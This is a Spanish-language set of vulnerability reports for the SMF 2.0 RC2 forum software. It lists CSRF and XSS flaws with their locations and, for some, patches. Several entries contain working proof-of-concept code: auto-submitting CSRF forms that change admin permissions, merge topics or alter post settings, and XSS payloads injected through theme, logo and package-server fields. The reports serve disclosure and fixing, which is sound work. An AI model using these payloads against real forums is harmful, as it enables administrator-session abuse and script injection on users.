Mensajes

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	CSRF permite darle permisos a los usuarios normales para modificar permisos del foro
Descubierto por:	ysk.sft@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

Descripción

Este CSRF permitiria solo haciendo que el administrador visite una web de
nosotros con su sesion de su foro abierta hacer que le de permisos a los
usuarios normales para cambiar los permisos de los grupos como por ejemplo
los moderadores globales .

El error fue probado en SMF 2.0 RC2

Ejemplo de un HTML que cambiaria los permisos:

Código (html4strict) [Seleccionar] Expandir

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
<script>
   $(document).ready(function(){
     $("#id_formulario").submit();
   });
</script>
<form id="id_formulario" action="http://localhost/foro2/index.php?action=admin;area=permissions;save;sa=settings" method = "POST" target = "asdf" >
<input name="manage_permissions[0]" value="on" />
<input name="manage_permissions[2]" value="off" />
<input name="manage_permissions[4]" value="off" />
<input name="manage_permissions[5]" value="off" />
<input name="manage_permissions[6]" value="off" />
<input name="manage_permissions[7]" value="off" />
<input name="manage_permissions[8]" value="off" />
<input name="permission_enable_deny" value="1" />
<input name="permission_enable_postgroups" value="1" />
</form>
<iframe name="asdf" id="asdf" src="/ruta/archivo.html"></iframe>


[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	CSRF en la union de temas
Descubierto por:	ysk.sft@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

Descripción

Este CSRF permite obligar a algún moderador o cualquiera con el poder de
unir 2 topics a unirlos.

Dejo un ejemplo de un html que obliga a unir el topic 1 con el topic 4 .

Código (html4strict) [Seleccionar] Expandir

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
<script>
   $(document).ready(function(){
     $("#id_formulario").submit();
   });
</script>
<form id="id_formulario" action="http://localhost/foro2/index.php?action=mergetopics;sa=execute" method = "POST" target = "asdf" >
<input name="topics[]" value="1" />
<input name="notifications[]" value="1" />
<input name="topics[]" value="4" />
<input name="notifications[]" value="4" />
<input name="subject" value="0" />
<input name="custom_subject" value="Nuevo titulo" />
<input name="enforce_subject" value="1" />
<input name="sa" value="execute" />
</form>

<iframe name="asdf" id="asdf" src="/ruta/archivo.html"></iframe>

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en el administrador de paquetes
Descubierto por:	cicatriz.r00t@gmail.com
Código vulnerable:	Sources/Packages.php:1384
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

Descripción

Este ataque de Cross-Site Scripting sucede cuando especificamos como FTP
Server ("pack_server" input) algo como:

Código (html4strict) [Seleccionar] Expandir

"/onmouseover="alert(0);

Este problema reside en la linea 1384 del archivo Sources/Packages.php
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Packages.php#1384

Aunque tambien se puede ver en otras variables:

Código (bash) [Seleccionar] Expandir

+++Packages.php @@ 1381:1388
 1381 if (isset($_POST['submit']))
 1382 {
 1383 updateSettings(array(
 1384 'package_server' => $_POST['pack_server'],
 1385 'package_port' => $_POST['pack_port'],
 1386 'package_username' => $_POST['pack_user'],
 1387 'package_make_backups' => !empty($_POST['package_make_backups'])
 1388 ));
---Packages.php

Esto se puede hacer automáticamente mediante CSRF, que aunque tiene un token el
formulario original no es checkeado.

Entonces el código seria simple:

Código (html4strict) [Seleccionar] Expandir

<body onload="document.forms[0].elements[4].click();">
<form accept-charset="UTF-8" method="post"
action="/index.php?action=admin;area=packages;sa=options">
<input type="text" size="30"
value="&#34;&#62;&#60;&#105;&#102;&#114;&#97;&#109;&#101;&#47;&#115;&#114;&#99;&#61;&#34;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#48;&#41;&#34;&#62;"
id="pack_server" name="pack_server"/>
<input type="text" value="" size="3" id="pack_port" name="pack_port"/>
<input type="text" size="30" value="" id="pack_user" name="pack_user"/>
<input type="checkbox" checked="checked" class="check" value="1"
id="package_make_backups" name="package_make_backups"/>
<input type="submit" value="Save" name="submit"/>
</form>
</body>

Solo con que se cumpla el if() se alojan las variables:

1381      if (isset($_POST['submit']))

El ataque XSS también se ejecuta en la sección de "File Permissions".

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en "theme url and settings"
Descubierto por:	brlvldvlsmrtnz@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	index.php?action=admin;area=theme;sa=settings;th=2;[token]
PoC:	http://urlreal"><script>alert(1);</script>
Afecta a:	‭‬SMF 2.0 RC2

Descripción

http://localhost/SMF/index.php?action=admin;area=theme;sa=edit;toke

Para arreglarlo hay que cambiar la línea 1711 del archivo themes.php por esta :

Código (php) [Seleccionar] Expandir

$context['themes'][$row['id_theme']][$row['variable']] =
htmlspecialchars($row['value']);

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en "theme url and settings"
Descubierto por:	brlvldvlsmrtnz@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	index.php?action=admin;area=theme;sa=settings;th=2;[token]
PoC:	http://urlreal"><script>alert(1);</script>
Afecta a:	‭‬SMF 2.0 RC2

Descripción

La vulnerabilidad se explota desde donde se configura el tema actual y es
vulnerable además del logo (que ya pusieron antes) en la url del tema y de
las imágenes.
Poniendo en las urls: http://urlreal"><script>alert("robamos tus cookies
gracias...");</script> se consigue ejecutar ese código ‭‬‭‬‭‬javascript cada vez
que se muestre una imagen o se llame  a una hoja de estilo.


Solución
Esto se arregla en las líneas 819,820,821 poniendo esto :

Código (php) [Seleccionar] Expandir

foreach ($_POST['options'] as $opt => $val)
$inserts[] = array(0, $_GET['th'], htmlspecialchars($opt),
is_array($val) ? implode(',', htmlspecialchars($val)) : $val);

En el archivo themes.php en la url :
http://localhost/SMF/index.php?action=admin;area=theme;sa=settings;th=2;[token]

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en "theme name" de "themes and layout settings"
Descubierto por:	brlvldvlsmrtnz@gmail.com
Código vulnerable:	Themes.php:346
URL Vulnerable:	index.php?action=admin;area=theme;sa=list;token
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

Descripción

Si en los theme settings cambias el nombre del tema por uno que contenga
html y te vas a los themes and layout settings, verás tu código.

El error está en el archivo Themes.php en la línea 346 en la que hay que
poner :

Código (php) [Seleccionar] Expandir

$context['themes'][$row['id_theme']][$row['variable']] = htmlspecialchars($row['value']);
Adjunto archivo supuestamente seguro.

http://localhost/SMF/index.php?action=admin;area=theme;sa=list;token


Solución
http://smf2-review.googlecode.com/issues/attachment?aid=5572441877403199176&name=Themes.php

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en el buscador de lenguajes
Descubierto por:	brlvldvlsmrtnz@gmail.com
Código vulnerable:	ManageServer.php:408
URL Vulnerable:	index.php?action=admin;area=languages;sa=add;[token]
PoC:	<xss>
Afecta a:	‭‬SMF 2.0 RC2

Descripción

La vulnerabilidad está en el buscador de lenguajes en la variable smf_add
que va dentro de un textbox.
Hay que escribir ">(codigo)

http://localhost/SMF/index.php?action=admin;area=languages;sa=add;[token]

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	CSRF en la configuración de post
Descubierto por:	brlvldvlsmrtnz@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	index.php?action=admin;area=postsettings;save;sa=posts
PoC:	<form name=exploit method=POST action=http://localhost/index.php?action=admin;area=postsettings;save;sa=posts <input type=hidden name=enableEmbeddedFlash value=1> </form>
Afecta a:	‭‬SMF 2.0 RC2

Descripción

The vulnerabilitie is found in the function ModifyPostSettings in the file
ManagePosts.php , this function allows to you to change the post settings
and it does not verify the token of the session so ... It is CSRF.
The POC:

Código (html4strict) [Seleccionar] Expandir

<html>
<head>
<title></title>
</head>
<body>
<form name=exploit method=POST action=http://localhost/index.php?action=admin;area=postsettings;save;sa=posts>
<input type=hidden name=enableEmbeddedFlash value=1>
</form>
<script>
document.exploit.submit();
</script>
</body>
</html>

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en la URL del logo
Descubierto por:	cicatriz.r00t@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	/index.php?action=admin;area=theme;sa=settings;th=1;
PoC:	options[header_logo_url]=."/onerror=alert(0);//
Afecta a:	‭‬SMF 2.0 RC2

Descripción

Bueno, esto en realidad no me pareció muy relevante pero quizás sirva de
todos modos. Si vamos a la pagina de administracion donde se cambia la
configuracion del theme que se esta usando
(/index.php?action=admin;area=theme;sa=settings;th=1;) y al modificar el
input "options[header_logo_url]", si ponemos algo como esto:

Código (html4strict) [Seleccionar] Expandir

."/onerror=alert(0);//

El código JS se ejecutaría en cualquier parte del foro.

[Detalles]

Detalles


 
 
 
 
 
 

Descripción:	XSS en el nombre del foro
Descubierto por:	ysk.sft@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

Descripción

El sistema para agregar subforos no filtra caracteres al agregar subforos,
haciendo que se pueda agregar codigo ‭‬javascript entre otros no solo en el
index si no que tambien en diversos lugares del panel de administración
entre ellos el mismo panel de administración de subforos , haciendo que
mediante codigo ‭‬javascript se podria hacer que en el navegador no se
pudiera ver el panel de administración de subforos haciendo casi imposible
para una persona de conocimientos basicos modificar el subforo para
eliminar el deface que se podria hacer con el XSS .

Saludos